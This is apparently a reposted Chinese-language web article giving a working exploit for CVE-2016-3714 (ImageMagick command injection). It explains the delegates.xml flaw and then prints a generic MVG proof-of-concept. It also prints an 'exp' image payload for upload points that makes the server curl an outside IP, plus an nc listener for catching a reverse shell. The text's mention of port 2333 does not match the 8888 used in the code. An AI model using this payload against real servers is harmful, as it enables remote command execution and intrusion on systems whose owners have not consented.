CVE-2016-3714-ImageMagick 漏洞利用


漏洞简介:/etc/ImageMagick/delegates.xml 将%s,%l加入到command里造成了命令执行

利用方式:

poc代码:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| command")'
pop graphic-context

  

图片上传点,抓包,附上exp代码:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"| curl 172.16.20.108:8888")'
pop graphic-context

 

ip:你要反弹的shell地址,2333端口号,服务器监听反弹shell。

nc -lvp 8888

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM